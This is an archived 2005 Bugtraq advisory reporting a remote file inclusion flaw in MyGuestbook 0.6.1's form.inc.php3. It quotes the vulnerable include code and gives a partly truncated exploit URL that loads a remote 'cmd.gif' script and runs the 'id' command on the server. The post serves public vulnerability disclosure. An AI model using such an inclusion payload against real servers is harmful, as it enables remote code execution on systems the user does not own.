Bugtraq mailing list archives
Remote File Inclusion in MyGuestbook
From: "rod hedor" <rodhedor () hotmail com>
Date: Wed, 14 Sep 2005 23:50:24 +0000
Remote File Inclusion in MyGuestbook Date: 10/07/2005 Severity: High version: 0.6.1 The bug reside in form.inc.php3 The Vulnerable Code if ($show < 1) { include ("form.inc.php3"); } Exploit : http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com Best Regards _________________________________________________________________Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Current thread:
- Remote File Inclusion in MyGuestbook rod hedor (Sep 15)
- Re: Remote File Inclusion in MyGuestbook security curmudgeon (Sep 23)